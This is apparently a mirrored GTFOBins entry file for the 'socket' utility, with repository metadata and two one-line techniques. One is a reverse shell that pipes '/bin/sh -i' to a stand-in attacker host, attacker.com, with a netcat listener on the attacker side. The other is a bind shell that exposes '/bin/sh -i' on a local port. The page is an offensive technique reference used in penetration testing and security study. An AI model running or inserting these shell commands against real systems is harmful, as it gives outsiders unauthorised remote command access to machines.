1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/socket.md
Andrea Cardaci aebe711cf0 Fix socket
2022-12-23 20:06:15 +01:00

404 B

functions
reverse-shell bind-shell
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 socket -qvp '/bin/sh -i' $RHOST $RPORT
description code
Run `nc target.com 12345` on the attacker box to connect to the shell. LPORT=12345 socket -svp '/bin/sh -i' $LPORT